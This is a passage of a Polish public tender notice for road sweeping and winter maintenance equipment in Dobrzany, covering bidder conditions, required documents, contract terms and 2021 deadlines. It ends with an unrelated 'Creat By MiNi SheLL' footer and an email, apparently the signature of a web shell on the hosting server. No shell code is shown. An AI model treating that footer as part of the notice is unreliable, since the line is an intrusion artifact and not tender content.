dotyczące:<br/>1)	zdolności do występowania w obrocie gospodarczym - Zamawiający nie stawia warunku w powyższym zakresie,<br/>2)	uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów - Zamawiający nie stawia warunku w powyższym zakresie,<br/>3)	sytuacji ekonomicznej lub finansowej - Zamawiający nie stawia warunku w powyższym zakresie,<br/>4)	zdolności technicznej lub zawodowej - Wykonawca spełni warunek, jeżeli wykaże, że: dysponuje co najmniej jedną zamiatarką samojezdną lub doczepianą do innego pojazdu oraz pługopiaskarką. <br/>3.	Zamawiający, w stosunku do Wykonawców wspólnie ubiegających się o udzielenie zamówienia, w odniesieniu do warunku dotyczącego zdolności technicznej lub zawodowej – nie dopuszcza łącznego spełniania warunku przez Wykonawców, tj. co najmniej jeden z Wykonawców musi spełniać przedmiotowy warunek samodzielnie.<br/>4.	Zamawiający może na każdym etapie postępowania uznać, że Wykonawca nie posiada wymaganych zdolności, jeżeli posiadanie przez Wykonawcę sprzecznych interesów, w szczególności zaangażowanie zasobów technicznych lub zawodowych Wykonawcy w inne przedsięwzięcia gospodarcze Wykonawcy może mieć negatywny wpływ na realizację zamówienia. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1) oświadczenie Wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy Pzp, o braku przynależności do tej<br/>samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i<br/>konsumentów (Dz. U. z 2021 r. poz. 275 ze zm.), z innym Wykonawcą, który złożył odrębną ofertę,<br/>ofertę częściową, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z<br/>dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej od innego<br/>Wykonawcy należącego do tej samej grupy kapitałowej – załącznik nr 3 do SWZ;<br/>2) odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o<br/>Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy Pzp, sporządzone nie wcześniej niż<br/>3 miesiące przed ich złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji;<br/>3) zaświadczenie albo inny dokument właściwej terenowej jednostki organizacyjnej Zakładu<br/>Ubezpieczeń Społecznych lub właściwego oddziału regionalnego lub właściwej placówki terenowej<br/>Kasy Rolniczego Ubezpieczenia Społecznego potwierdzającego, że Wykonawca nie zalega z<br/>opłacaniem składek na ubezpieczenia społeczne i zdrowotne, w zakresie art. 109 ust. 1 pkt 1 ustawy<br/>Pzp, wystawione nie wcześniej niż 3 miesiące przed jego złożeniem, a w przypadku zalegania z<br/>opłacaniem składek na ubezpieczenia społeczne lub zdrowotne wraz z zaświadczeniem albo innym<br/>dokumentem Zamawiający żąda złożenia dokumentów potwierdzających, że odpowiednio przed<br/>upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu albo przed upływem<br/>terminu składania ofert Wykonawca dokonał płatności należnych składek na ubezpieczenia społeczne<br/>lub zdrowotne wraz odsetkami lub grzywnami lub zawarł wiążące porozumienie w sprawie spłat tych<br/>należności;<br/>4) zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie<br/>zalega z opłacaniem podatków i opłat, w zakresie art. 109 ust. 1 pkt 1 ustawy Pzp, wystawione nie<br/>wcześniej niż 3 miesiące przed jego złożeniem, a w przypadku zalegania z opłacaniem podatków lub<br/>opłat wraz z zaświadczeniem zamawiający żąda złożenia dokumentów potwierdzających, że<br/>odpowiednio przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu<br/>albo przed upływem terminu składania ofert Wykonawca dokonał płatności należnych podatków lub<br/>opłat wraz z odsetkami lub grzywnami lub zawarł wiążące porozumienie w sprawie spłat tych<br/>należności. Ciąg dalszy informacji w sekcji IX Pozostałe informacje</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">5)	wykaz narzędzi, wyposażenia zakładu lub urządzeń technicznych dostępnych Wykonawcy w celu wykonania zamówienia publicznego wraz z informacją o podstawie do dysponowania tymi zasobami – tu pojazdów – podać należy: ilość, nazwę sprzętu, rok produkcji – załącznik nr 4 do SIWZ.</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1) oświadczenie, o którym mowa w Rozdziale X ust. 1 SWZ;<br/>2) zobowiązanie innego podmiotu, o którym mowa w Rozdziale XI ust. 3 SWZ (jeżeli dotyczy);<br/>3) pełnomocnictwo, o którym mowa w rozdziale XII ust. 1. w przypadku oferty składanej wspólnie<br/>(jeżeli dotyczy),<br/>4) oświadczenie, o którym mowa w Rozdziale XII ust. 3 SWZ (jeżeli dotyczy);<br/>5) odpowiednie pełnomocnictwo (jeżeli dotyczy), tj. w przypadku gdy oferta nie została podpisana przez osobę uprawnioną do reprezentacji Wykonawcy określoną w odpowiednim<br/>rejestrze lub innym dokumencie właściwym dla danej formy organizacyjnej Wykonawcy (jeżeli<br/>dotyczy). <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku<br/>Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do<br/>reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.<br/>Umocowanie winno być załączone do oferty.<br/>2. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia,<br/>oświadczenia, o których mowa w Rozdziale X ust. 1 SWZ, składa każdy z Wykonawców<br/>wspólnie ubiegających się zamówienie. Oświadczenia te potwierdzają brak podstaw<br/>wykluczenia oraz spełnianie warunków udziału w zakresie, w jakim każdy z Wykonawców<br/>wykazuje spełnianie warunków udziału w postępowaniu.<br/>3. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty<br/>oświadczenie, z którego wynika, które usługi wykonają poszczególni Wykonawcy.<br/>4. Podmiotowe środki dowodowe potwierdzające brak podstaw do wykluczenia z postępowania<br/>składa każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Rodzaj i zakres zmian umowy określony został w par. 10 projektu umowy dołączonego do SWZ <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-11-22 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://dobrzany.ezamawiajacy.pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-11-22 10:10</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-12-21</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 5. Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej<br/>Polskiej, zamiast dokumentów, o których mowa w ust. 4 pkt 2, 3 i 4, składa dokument lub<br/>dokumenty wystawione w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania,<br/>potwierdzające, że:<br/>1) nie otwarto jego likwidacji, nie ogłoszono upadłości, jego aktywami nie zarządza likwidator lub<br/>sąd, nie zawarł układu z wierzycielami, jego działalność gospodarcza nie jest zawieszona ani<br/>nie znajduje się on w innej tego rodzaju sytuacji wynikającej z podobnej procedury przewidzianej<br/>w przepisach miejsca wszczęcia tej procedury,<br/>2) nie naruszył obowiązków dotyczących płatności podatków, opłat lub składek na<br/>ubezpieczenie społeczne lub zdrowotne,<br/>Dokumenty, o których mowa w pkt 1 i 2 powinny być wystawione nie wcześniej niż 3 miesiące<br/>przed upływem terminu składania ofert.<br/>6. Jeżeli w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się<br/>dokumentów, o których mowa w ust. 5, zastępuje się je w całości lub części dokumentem<br/>zawierającym odpowiednio oświadczenie Wykonawcy, ze wskazaniem osoby albo osób<br/>uprawnionych do jego reprezentacji lub oświadczenie osoby, której dokument miał dotyczyć,<br/>złożone pod przysięgą, lub, jeżeli w kraju, w którym Wykonawca ma siedzibę lub miejsce<br/>zamieszkania nie ma przepisów o oświadczeniu pod przysięgą, złożone przed organem<br/>sądowym lub administracyjnym, notariuszem, organem samorządu zawodowego lub<br/>gospodarczego, właściwym ze względu na siedzibę lub miejsce zamieszkania Wykonawcy.<br/>Termin określony w ust. 5 stosuje się odpowiednio.<br/>7. Wykonawca nie jest zobowiązany do złożenia podmiotowych środków dowodowych, które<br/>Zamawiający posiada, jeżeli Wykonawca wskaże te środki oraz potwierdzi ich prawidłowość i<br/>aktualność.<br/>8. Zamawiający nie wzywa do złożenia podmiotowych środków dowodowych, jeżeli:<br/>1) może je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, w szczególności<br/>rejestrów publicznych w rozumieniu ustawy z dnia 17 lutego 2005 r. o informatyzacji działalności<br/>podmiotów realizujących zadania publiczne (Dz. U. z 2021 r. poz. 670 ze zm.), o ile Wykonawca<br/>wskazał w oświadczeniu, o którym mowa w art. 125 ust. 1 Pzp. dane umożliwiające dostęp do<br/>tych środków;<br/>2) je posiada, a Wykonawca wskaże te środki oraz potwierdzi ich prawidłowość i aktualność.<br/>9. W zakresie nieuregulowanym ustawą Pzp lub niniejszą SWZ do podmiotowych środków<br/>dowodowych oraz innych oświadczeń i dokumentów składanych przez Wykonawcę w<br/>postępowaniu zastosowanie mają w szczególności przepisy rozporządzenia Ministra Rozwoju<br/>Pracy i Technologii z dnia 23 grudnia 2020 r. w sprawie podmiotowych środków dowodowych<br/>oraz innych dokumentów lub oświadczeń, jakich może żądać Zamawiający od Wykonawcy (Dz.<br/>U. poz. 2415), oraz rozporządzenia Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w<br/>sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla<br/>dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o<br/>udzielenie zamówienia publicznego lub konkursie (Dz. U. z 2020 r. poz. 2452).

Creat By MiNi SheLL
Email: jattceo@gmail.com